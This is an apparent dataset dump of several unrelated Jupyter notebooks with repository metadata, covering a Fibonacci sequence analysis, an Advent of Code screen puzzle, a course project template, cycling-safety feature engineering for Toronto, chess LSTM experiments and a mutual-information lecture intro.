other hand, a row ending with a cat cannot be extended with another heads, which is indicated by the value 0 at the right bottom element of $A$.\n\nA general case of $v_n$ can therefore be calculated using matrix exponentation $A^n$ and the initial value $v_0$:\n\n$v_{n} = \\begin{bmatrix} t_{n} \\\\ h_{n} \\end{bmatrix} = \n\\begin{bmatrix} 1 & 1 \\\\ 1 & 0 \\end{bmatrix}^n \\cdot\n\\begin{bmatrix} t_0 \\\\ h_0 \\end{bmatrix} = A^n \\cdot v_0\n$\n\nThe number of rows ending with a heads or tails, and the total number of possible rows are calculated in the cell below for row lengths of $1 \\leq n \\leq 20$.\nThe table also shows the percentage of heads in the row and the number of valid rows compared to the total number of rows $2^N$:",
"_____no_output_____"
]
],
[
[
"A = np.array([[1,1],[1,0]])\nv = np.array([1,1]).T\n\nheads = []\ntails = []\nfor N in range(20):\n    vn = matrix_power(A,N).dot(v)\n    tails.append(vn[0])\n    heads.append(vn[1])\n\ndf = pd.DataFrame()\ndf['heads'] = heads\ndf['tails'] = tails\ndf['Total'] = df['heads']+df['tails']\ndf['tails/heads Ratio'] = df['tails']/df['heads']\ndf['tails percentage'] = 100*df['tails']/df['Total']\ndf['tails percentage'] = df.apply(lambda x: \"{:.3f}%\".format(x['tails percentage']), axis=1)\ndf.index += 1\n\ndf['Valid sequences'] = df.Total/(2**df.index)\ndf['Valid sequences'] = df.apply(lambda x: \"{:.3f}%\".format(100*x['Valid sequences']), axis=1)\n\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"The above table shows that all three sequences follow the Fibonacci model, and the ratio of rows ending with a heads and rows ending with a tails approaches the Golden Ratio $\\phi = \\frac{1+\\sqrt{5}}{2}\\approx 1.618$.\n\nIt is the larger root of the characteristic polynomial:\n\n$\\phi^2−\\phi−1=0$.\n\nThe other root is $\\frac{1-\\sqrt{5}}{2} = -\\phi^{-1} = 1-\\phi \\approx -0.618$.\n\nThe constant $\\phi$ is also found in the [eigenvalue decomposition](https://www.wolframalpha.com/input/?i=%7B%7B1%2C1%7D%2C%7B1%2C0%7D%7D) of the matrix $A$:\n\n$\nA = C \\Lambda C^{-1} = \n\\begin{bmatrix} \\phi & 1-\\phi \\\\ 1 & 1 \\end{bmatrix} \\cdot\n\\begin{bmatrix} \\phi & 0 \\\\ 0 & 1-\\phi \\end{bmatrix} \\cdot\n\\begin{bmatrix} \\phi & 1-\\phi \\\\ 1 & 1 \\end{bmatrix}^{-1}\n$",
"_____no_output_____"
]
],
[
[
"L,C = np.linalg.eig(A)\nD=np.diag(L)\nprint(C)\nprint(D)\n\nprint((0.5+C.dot(D).dot(matrix_power(C,-1))).astype('int'))\nphi = (1+5**0.5)/2\nphi_2 = 1-phi\nC2 = np.array([[phi, phi_2], [1,1]])\nD2 = [[phi, 0], [0, phi_2]]\n# print((0.5+C2.dot(D2).dot(np.linalg.matrix_power(C2,-1))).astype('int'))",
"[[ 0.85065081 -0.52573111]\n [ 0.52573111 0.85065081]]\n[[ 1.61803399 0. ]\n [ 0. -0.61803399]]\n[[1 1]\n [1 0]]\n"
]
],
[
[
"## What value is the percentage of tails ~61.8%:\n\nIt is the ratio of two sequental Fibonacci numbers $F_{n-1}$ and $F_{n}$\n\n$\\lim_{n \\rightarrow \\infty} F_{n-1}/F_{n}$\n$ = \\phi^{-1} = \\phi -1 \\approx 0.618$ ",
"_____no_output_____"
]
],
[
[
"(phi**-1, phi-1)",
"_____no_output_____"
]
],
[
[
"### What value is the tails percentage ~38.2% ?\n\nIt is the ratio of two Fibonacci numbers $F_{n-2}$ and $F_{n}$\n\n$\\lim_{n \\rightarrow \\infty} F_{n-2}/F_{n}$\n$ = \\phi^{-2} = 1-\\phi^{-1} = 2-\\phi \\approx 0.382$ \n\nNice how these values can be written using so many different expressions!",
"_____no_output_____"
]
],
[
[
"(phi**-2, 1-phi**-1, 2-phi)",
"_____no_output_____"
]
],
[
[
"# case of more than two species\n\nWe can apply the method described above also for the cases where there are more than two species of animals. Like for instance in a case of four species the recurrency matrix $A$ could become:\n\n$A=\\begin{bmatrix} \n1 & 1 & 1 & 1 \\\\ \n1 & 0 & 1 & 1 \\\\ \n1 & 1 & 0 & 1 \\\\ \n1 & 1 & 1 & 0 \\\\ \n\\end{bmatrix}$\n\nIn this example matrix, similar rules apply as for the dogs and cats: you can put the first animal next to any other animal. The rest of species behaves like the cats in the example problem, you cannot put them next to one another.\n\nThe table below shows the results of the calculations with the number of species $2\\leq T \\leq 6$:",
"_____no_output_____"
]
],
[
[
"outcomes = []\nTs = []\nfor T in range(2,7):\n A = np.ones((T,T)) - np.identity(T)\n A[0,0] = 1\n v = np.array([1]*T).T\n res = []\n for N in range(12):\n vn = np.linalg.matrix_power(A,N).dot(v)\n res.append(int(sum(vn)))\n outcomes.append(res)\n Ts.append(T)\n\ndf = pd.DataFrame()\n\nprx = \"Number of outcome: \"\nfor i, arr in zip(Ts, outcomes):\n df[prx+str(i)] = arr\n prx = \"\"\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7060df8ac62618ac2f4b606e344ccb8efe3177d | 3,867 | ipynb | Jupyter Notebook | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | 25.95302 | 101 | 0.385312 | [
[
[
"#!/usr/bin/env\nimport numpy, re\n\nclass BrokenScreen(object):\n def __init__(self, x, y):\n self.screen = numpy.zeros((x,y))\n \n def rect(self, x, y):\n self.screen[0:y,0:x] = 1\n \n def rotate_column(self, x, by):\n self.screen[0:,x] = numpy.roll(self.screen[0:,x], by)\n \n def rotate_row(self, y, by):\n self.screen[y, 0:] = numpy.roll(self.screen[y, 0:], by)\n \n def cmd(self, input_str):\n m = re.match('rect (\\d+)x(\\d+)', input_str)\n if m:\n self.rect(int(m.group(1)), int(m.group(2)))\n return\n m = re.match('rotate (?:row|column) y=(\\d+) by (\\d+)', input_str)\n if m:\n self.rotate_row(int(m.group(1)), int(m.group(2)))\n return\n m = re.match('rotate (?:row|column) x=(\\d+) by (\\d+)', input_str)\n if m:\n self.rotate_column(int(m.group(1)), int(m.group(2)))\n return\n print \"UNKNOWN COMMAND\", input_str\n\n def __str__(self):\n return '\\n'.join([''.join([('#' if e else '.') for e in row]) for row in self.screen])",
"_____no_output_____"
],
[
"scr = BrokenScreen(3,7)\nprint str(scr)\nprint \"rect 3x2\"\nscr.cmd(\"rect 3x2\")\nprint str(scr)\nprint \"rotate column x=1 by 1\"\nscr.cmd(\"rotate column x=1 by 1\")\nprint str(scr)\nprint \"rotate row y=0 by 4\"\nscr.cmd(\"rotate row y=0 by 4\")\nprint str(scr)\nprint \"rotate row x=1 by 1\"\nscr.cmd(\"rotate row x=1 by 1\")\nprint str(scr)",
".......\n.......\n.......\nrect 3x2\n###....\n###....\n.......\nrotate column x=1 by 1\n#.#....\n###....\n.#.....\nrotate row y=0 by 4\n....#.#\n###....\n.#.....\nrotate row x=1 by 1\n.#..#.#\n#.#....\n.#.....\n"
],
[
"scr = BrokenScreen(6,50)\nwith open('Dec8.input', 'r') as f:\n for line in f:\n scr.cmd(line)\nprint scr.screen.sum()\nprint scr",
"110.0\n####...##.#..#.###..#..#..##..###..#....#...#..##.\n...#....#.#..#.#..#.#.#..#..#.#..#.#....#...#...#.\n..#.....#.####.#..#.##...#....#..#.#.....#.#....#.\n.#......#.#..#.###..#.#..#....###..#......#.....#.\n#....#..#.#..#.#.#..#.#..#..#.#....#......#..#..#.\n####..##..#..#.#..#.#..#..##..#....####...#...##..\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
e706120425ecff7e8556b9fe8da9ae8e1e719581 | 3,924 | ipynb | Jupyter Notebook | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | 1 | 2021-08-25T13:02:15.000Z | 2021-08-25T13:02:15.000Z | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | null | null | null | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | 2 | 2021-07-21T20:43:20.000Z | 2021-08-25T13:02:16.000Z | 25.986755 | 392 | 0.598879 | [
[
[
"# Your Final Project Title Goes Here",
"_____no_output_____"
],
[
"## Your Name Here",
"_____no_output_____"
],
[
"5 points for on-time submission of project proposal",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the introduction you will (i) describe your broad topic of wide relevance or interest and (ii) provide a concrete statement of the scientific question explored or hypothesis tested. I recommend starting broad and narrowing down to the specifics of your project.\n\nIt is not required to provide citations to scientific literature, though you may if you used outside resources.\n\n15 points.",
"_____no_output_____"
],
[
"## Methods",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the methods, you will detail your methodology. Make sure to describe **in words** which model you used, why you used it, and, if applicable, how you configured it. If using pre-generated model output (e.g., CESM) also describe the climate fields that you will be inspecting. **In this section, you will include the code to build the model or load the model output.**\n\n15 points.",
"_____no_output_____"
],
[
"## Results",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the results, you will show your original calculations. Include all the code necessary to generate your results, and clearly communicate your results as well-labeled figures and tables as appropriate. Your work must be completely reproducible (i.e., the instructor must be able to run the Jupyter notebook cleanly from start to finish).\n\nThe expected format is a mix of code cells, Markdown (text) cells, and products (figures, tables, etc.). You may add subsections to organize your results section if desired.\n\n50 points total.",
"_____no_output_____"
],
[
"## Conclusions",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the conclusions, you will provide a summary of what you learned. Make sure that your conclusions are supported by the results and that you discuss limitations and implications.\n\n15 points.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e706235b69b129fa8d2aa7f61033f003f9a29d51 | 405,164 | ipynb | Jupyter Notebook | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | 518.112532 | 378,860 | 0.930492 | [
[
[
"### Feature Engineering and Data Processing: Y-SIGN data 2022-03\nThis file is for R&D of features for the model. Features should be created using functions that can then be cut and paste into the model_functions.py file to be imported into the final model .ipynb file.\n\nWe should split our data before we do any of this! (before splitting, need expand the intersections data to every road, or just use the direct adjacant values).",
"_____no_output_____"
]
],
[
[
"# Import 3rd party libraries\nimport os\nimport json\nimport requests\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\n\n# Configure Notebook\n%matplotlib inline\nplt.style.use('dark_background')\n#plt.style.use('ggplot')\nsns.set_context(\"notebook\")\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
]
],
[
[
"#### Import the train data (LTS data + intersections, neighbourhoods ...)",
"_____no_output_____"
],
[
"#### Data Processing",
"_____no_output_____"
],
[
"Import the data",
"_____no_output_____"
]
],
[
[
"train_data = pd.read_csv('C:/Users/Keagan Rankin/Documents/PycharmProj/data/training_data/ysign_dropoff2_iter15_train.csv')\ntrain_data.head()",
"_____no_output_____"
],
[
"train_data['ysign vehicle'].quantile(0.75)",
"_____no_output_____"
]
],
[
[
"Create a function that drops outliers in the ysign data, <br>\nWe don't want to remove outliers based on YSIGN, but instead outliers should be removed during data cleaning before the test train split (based on the overall 8 hour peak) <br>\nEven then, we don't really want to discount any measurements as these are \"peaks\" over time. lets not remove outliers <br>\nWe can however remove all the rows we don't want",
"_____no_output_____"
]
],
[
[
"def droprows(data, keep):\n \"\"\"\n Function drops rows that are not passed in 'keep' list.\n \"\"\"\n \n #Drop\n data_drop = data[keep]\n \n return data_drop\n\nkeep_rows = ['OBJECTID', 'GEO_ID',\n 'LTS',\t'geometry',\t'ysign vehicle', \n 'ysign ped', 'high access']\n\ntrain_data = ysign_droprows(train_data, keep_rows)\ntrain_data.head()",
"_____no_output_____"
]
],
[
[
"We also suspect that there is a geospatial relationship for LTS. If we do PCA like in assignment 7 in the centroids of the centrelines, <br>\nand then dummy encode regions in toronto along the principle components, we can use this as a feature.",
"_____no_output_____"
]
],
[
[
"from shapely import wkt",
"_____no_output_____"
],
[
"from sklearn.decomposition import PCA\ndef add_regions(data, components, bins):\n \"\"\"\n function extract PC of Toronto's geometry and bins it into a # of regions.\n \n takes: in data, # of components, and # of bins.\n returns: the training data with x_regions and y_regions labels for dummy encoding.\n \"\"\"\n # Extract the centroids of the LINESTRING geometry.\n # Also return the x y components of these centroids\n data_g = data.copy()\n data_g['geometry'] = data_g['geometry'].apply(wkt.loads)\n train_data_gpd = gpd.GeoDataFrame(data_g, crs=\"EPSG:26917\")\n train_data_gpd.head()\n \n centroids = train_data_gpd['geometry'].centroid\n centroids_df = pd.DataFrame(data={'x':centroids.x, 'y':centroids.y})\n \n # Scale features.\n scaler = StandardScaler().fit(centroids_df)\n X_scaled = scaler.transform(centroids_df)\n \n # Create/fit PCA function.\n pca = PCA(n_components=components)\n X_transformed = pca.fit_transform(X_scaled)\n X_transformed_df = pd.DataFrame(X_transformed)\n \n # Print results.\n for i in range(components):\n print('Principal component', i)\n print('explains', (pca.explained_variance_ratio_[i] * 100), '% of the variance in \"lon\" and \"lat\".')\n \n # Return inversed values\n X_new = pca.inverse_transform(X_transformed)\n X_new = scaler.inverse_transform(X_new)\n X_new_df = pd.DataFrame(X_new)\n \n # Bin geographic regions based on components\n out = pd.qcut(X_transformed_df[0], bins, labels=np.arange(1,bins+1,1))\n out2 = pd.qcut(X_transformed_df[1], bins, labels=np.arange(1,bins+1,1)) \n \n #Append the bin labels to the geo data.\n data_g['x_region'] = out\n data_g['y_region'] = out2\n \n #return X_transformed_df, centroids_df\n return data_g\n \n#pcs, geo_points = add_regions(train_data, 2, 5)\ntrain_data = add_regions(train_data, 2, 6)",
"Principal component 0\nexplains 74.76311274393491 % of the variance in \"lon\" and \"lat\".\nPrincipal component 1\nexplains 25.236887256065092 % of the variance in \"lon\" and \"lat\".\n"
],
[
"plotr = gpd.GeoDataFrame(train_data, crs=\"EPSG:26917\")\n#plotr['newlab'] = plotr['x_region'] / plotr['y_region']\n\nfig, ax = plt.subplots(1,2, figsize=(16,8))\nplotr.plot(ax=ax[0], column='x_region')\nplotr.plot(ax=ax[1], column='y_region')",
"_____no_output_____"
]
],
[
[
"Define a function that scales all numerical features and dummy encodes all categorical features",
"_____no_output_____"
]
],
[
[
"from sklearn.preprocessing import StandardScaler\ndef scale_and_dummy(data, scale_feats, dummy_feats):\n \"\"\"\n Scales the passed columns of data.\n Dummy encode categorical features passed\n \"\"\"\n \n # Create scaler\n scaler = StandardScaler()\n scaler.fit(data[scale_feats])\n \n scaled = data[scale_feats].copy()\n \n # Convert numeric features to standard units\n scaled = scaler.transform(scaled)\n data[scale_feats] = scaled\n \n # Convert categorical features using dummy encoding. \n #Drop the encoded features from the frame.\n for s in dummy_feats:\n categorical = pd.get_dummies(data[s], prefix=s, drop_first=True)\n data = pd.concat((data, categorical), axis=1)\n \n data = data.drop(dummy_feats, axis=1)\n \n return data\n \ntrain_data = scale_and_dummy(train_data, ['ysign vehicle', 'ysign ped'], ['x_region', 'y_region'])",
"_____no_output_____"
],
[
"train_data.head()",
"_____no_output_____"
]
],
[
[
"#### Advanced cross validation\nWe may want to do an advanced, spatial cross validation due to the nature of the data.<br>\ncreate a function that performs this cross val",
"_____no_output_____"
]
]
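,
[
    [
        "A minimal sketch of the idea (assumptions on our part: the `x_region`/`y_region` labels from `add_regions` are kept aside before dummy encoding, and `model`, `X`, `y` are the usual estimator inputs). Scikit-learn's `GroupKFold` keeps all segments from one region together, so no fold leaks spatial neighbours between train and test.",
        "_____no_output_____"
    ]
],
[
    [
        "from sklearn.model_selection import GroupKFold\n\ndef spatial_cross_val(model, X, y, groups, n_splits=5):\n    \"\"\"\n    Hedged sketch of a spatial cross validation:\n    folds never share a geographic group label.\n    \"\"\"\n    gkf = GroupKFold(n_splits=n_splits)\n    scores = []\n    for train_idx, test_idx in gkf.split(X, y, groups=groups):\n        # fit on one set of regions, score on held-out regions\n        model.fit(X.iloc[train_idx], y.iloc[train_idx])\n        scores.append(model.score(X.iloc[test_idx], y.iloc[test_idx]))\n    return scores\n\n# hypothetical usage, e.g. grouping by the PCA-derived region labels:\n# scores = spatial_cross_val(model, X_train, y_train, groups=region_labels)",
        "_____no_output_____"
    ]
]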
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e7062a6443581635d3d65d6d128bf7750261d11d | 31,949 | ipynb | Jupyter Notebook | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | null | null | null | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | 19 | 2020-12-29T20:39:08.000Z | 2021-04-09T18:11:43.000Z | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | null | null | null | 28.198588 | 1,493 | 0.531222 | [
[
[
"# Base Data Science snippet\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport time\nfrom tqdm import tqdm_notebook\n\n%matplotlib inline\n%load_ext autoreload\n%autoreload 2\n\nfrom comet_ml import Experiment",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n"
]
],
[
[
"##### TODO\n- Test the ``chess`` library\n - Convert to numpy array\n - Gif \n- Use pre-existing GameAI\n- Create GameAI with minimax techniques\n- Evaluation function for each move\n- Move recommendation \"à la\" AlphaGo, MCTS ?\n- Notebook interface to play\n- Adaptive GameAI\n\n",
"_____no_output_____"
]
],
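[
    [
        "A rough sketch for the minimax TODO (assumptions: plain `python-chess` boards and a naive material evaluation; wiring this into a `beth` player class is left open):",
        "_____no_output_____"
    ]
],
[
    [
        "import chess\n\n# naive material values; the king is excluded from the count\nPIECE_VALUES = {chess.PAWN: 1, chess.KNIGHT: 3, chess.BISHOP: 3,\n                chess.ROOK: 5, chess.QUEEN: 9}\n\ndef evaluate(board):\n    # material balance from White's point of view\n    score = 0\n    for piece_type, value in PIECE_VALUES.items():\n        score += value * len(board.pieces(piece_type, chess.WHITE))\n        score -= value * len(board.pieces(piece_type, chess.BLACK))\n    return score\n\ndef minimax(board, depth, maximizing):\n    # depth-limited minimax without pruning, for illustration only\n    if depth == 0 or board.is_game_over():\n        return evaluate(board), None\n    best_score = float('-inf') if maximizing else float('inf')\n    best_move = None\n    for move in board.legal_moves:\n        board.push(move)\n        score, _ = minimax(board, depth - 1, not maximizing)\n        board.pop()\n        if (maximizing and score > best_score) or (not maximizing and score < best_score):\n            best_score, best_move = score, move\n    return best_score, best_move\n\n# hypothetical usage:\n# score, move = minimax(chess.Board(), depth=2, maximizing=True)",
        "_____no_output_____"
    ]
],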
[
[
"import sys\nsys.path.append(\"../\")\n\nfrom beth.game import Game\nfrom beth.players.random_player import RandomPlayer\nfrom beth.players.human_player import HumanPlayer\nfrom beth.players.sequence import SequenceGame,SequencePlayer",
"_____no_output_____"
]
],
[
[
"# Playground",
"_____no_output_____"
]
],
[
[
"black = RandomPlayer()\nwhite = RandomPlayer()\n\n# white = HumanPlayer()\n# black = HumanPlayer()\n\ngame = Game(white,black)",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
],
[
"game.reset_game()\ngame.run()",
"_____no_output_____"
],
[
"game.board.is_seventyfive_moves()",
"_____no_output_____"
]
],
[
[
"# Game exploration",
"_____no_output_____"
]
],
[
[
"games = pd.read_csv(\"../data/raw/kaggle/games.csv\")",
"_____no_output_____"
],
[
"games.shape",
"_____no_output_____"
],
[
"\"start \" + games[\"moves\"].head()",
"_____no_output_____"
],
[
"game = games.iloc[2]\n\nseq_str = game[\"moves\"]\nwinner = game[\"winner\"]\nvictory_status = game[\"victory_status\"]",
"_____no_output_____"
],
[
"seq = SequenceGame(seq_str,0.1,victory_status,winner)\ngame = Game(seq.white,seq.black)\nseq_str",
"_____no_output_____"
],
[
"seq.victory_status",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
]
],
[
[
"https://pytorch.org/tutorials/beginner/transformer_tutorial.html",
"_____no_output_____"
],
[
"# Experiment 1 using LSTMs\nhttps://www.kdnuggets.com/2020/07/pytorch-lstm-text-generation-tutorial.html",
"_____no_output_____"
]
],
[
[
"from beth.models.dataset import Dataset\nfrom beth.utils import make_experiment\nfrom beth.models.lstm import LSTMModel\nfrom beth.players.ai_player import AIPlayer",
"_____no_output_____"
]
],
[
[
"## Init classes",
"_____no_output_____"
]
],
[
[
"games = pd.read_csv(\"../data/raw/kaggle/games.csv\")\nmoves = \"start \" + games[\"moves\"]\nmoves.head()",
"_____no_output_____"
],
[
"moves[0]",
"_____no_output_____"
],
[
"dataset = Dataset(moves)",
"_____no_output_____"
],
[
"len(dataset.uniq_words)",
"_____no_output_____"
]
],
[
[
"## Train loop",
"_____no_output_____"
]
],
[
[
"experiment = make_experiment(\"../.env\",\"Simple LSTM\",[\"NLP\",\"LSTM\"])",
"COMET INFO: Experiment is live on comet.ml https://www.comet.ml/theolvs/beth/2f28f4cbecb646179c6a3d4a0ca2b444\n\n"
],
[
"params = {\n \"sequence_length\":10,\n \"batch_size\":32,\n \"max_epochs\":1,\n \"lr\":0.01,\n \"lstm_size\":128,\n \"embedding_dim\":128,\n \"num_layers\":3,\n}",
"_____no_output_____"
],
[
"model = LSTMModel(dataset,**params)",
"_____no_output_____"
],
[
"experiment.log_parameters(params)\nmodel.fit(**params)\n# experiment.end()",
"_____no_output_____"
],
[
"model.save_weights(\"lstm_20122020.pth\")",
"_____no_output_____"
],
[
"experiment.log_text(\"Learning rate does not seem to accelerate anything here, let's stick to around 0.001\")",
"_____no_output_____"
],
[
"experiment.end()",
"COMET INFO: ---------------------------\nCOMET INFO: Comet.ml Experiment Summary\nCOMET INFO: ---------------------------\nCOMET INFO: Data:\nCOMET INFO: display_summary_level : 1\nCOMET INFO: url : https://www.comet.ml/theolvs/beth/2f28f4cbecb646179c6a3d4a0ca2b444\nCOMET INFO: Metrics [count] (min, max):\nCOMET INFO: loss [1242] : (3.267238140106201, 8.412087440490723)\nCOMET INFO: Others:\nCOMET INFO: Name : Simple LSTM\nCOMET INFO: Parameters:\nCOMET INFO: batch_size : 32\nCOMET INFO: embedding_dim : 128\nCOMET INFO: lr : 0.01\nCOMET INFO: lstm_size : 128\nCOMET INFO: max_epochs : 1\nCOMET INFO: num_layers : 3\nCOMET INFO: sequence_length : 10\nCOMET INFO: Uploads:\nCOMET INFO: code : 1 (3 KB)\nCOMET INFO: environment details : 1\nCOMET INFO: filename : 1\nCOMET INFO: git metadata : 1\nCOMET INFO: git-patch (uncompressed) : 1 (14 MB)\nCOMET INFO: installed packages : 1\nCOMET INFO: model graph : 1\nCOMET INFO: notebook : 1\nCOMET INFO: text-sample : 1\nCOMET INFO: ---------------------------\nCOMET INFO: Still uploading\n"
],
[
"p = model.predict(\"start\",1,as_proba = True)",
"_____no_output_____"
],
[
"p",
"_____no_output_____"
],
[
"p[0].sort_values(ascending = False).head(10)",
"_____no_output_____"
]
],
[
[
"## Test in games",
"_____no_output_____"
]
],
[
[
"model = LSTMModel(dataset)",
"_____no_output_____"
],
[
"model.load_weights(\"lstm_20122020.pth\")",
"_____no_output_____"
],
[
"# black = RandomPlayer()\n# white = RandomPlayer()\n\nwhite = AIPlayer(brain=model)\n# black = AIPlayer(brain=model)\n\n# white = HumanPlayer()\nblack = HumanPlayer()\n\ngame = Game(white,black)",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
],
[
"p = model.predict_next(game)[0]",
"_____no_output_____"
],
[
"p.loc[game.get_legal_moves_san()].sort_values(ascending = False)",
"_____no_output_____"
],
[
"stack[0]",
"_____no_output_____"
],
[
"x = stack[0]",
"_____no_output_____"
],
[
"game.board.san(stack[1])",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7062ca1131d88ba283e7b7fe072f3d54206b8bb | 1,593 | ipynb | Jupyter Notebook | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | 1 | 2021-08-17T15:16:11.000Z | 2021-08-17T15:16:11.000Z | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | null | null | null | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | null | null | null | 36.204545 | 572 | 0.694915 | [
[
[
"# Mutual Information in Machine Learning",
"_____no_output_____"
],
[
"Mutual information is a fundamental quantity in information theory. It is widely used in machine learning to measure statistical dependency among different features in data. Applications are numerous, ranging from classification, clustering, representation learning, and other tasks that require the selection/extraction of lower-dimensional features of the data without losing valuable information. Although mutual information has a precise formula defined in terms of a probability model, it must be estimated for real-world data with an unknown probability model.",
"_____no_output_____"
],
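    [
        "For reference, the standard definition: for discrete random variables $X$ and $Y$ with joint distribution $p(x,y)$ and marginals $p(x)$ and $p(y)$,\n\n$$I(X;Y) = \\sum_{x}\\sum_{y} p(x,y)\\,\\log\\frac{p(x,y)}{p(x)\\,p(y)},$$\n\nwhich equals zero exactly when $X$ and $Y$ are independent.",
        "_____no_output_____"
    ],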
[
"In this lecture series, we will dive into some of the applications and estimations of mutual information in machine learning. Registered participants will have hands-on coding experience using the virtual teaching and learning environment DIVE offered by CityU CS Department.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
]
] |
e7064e180823e086fb5d0b6b3750a489a1b0228e | 202,884 | ipynb | Jupyter Notebook | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | 202,884 | 202,884 | 0.935347 | [
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n",
"_____no_output_____"
],
[
"!pip install --upgrade tables",
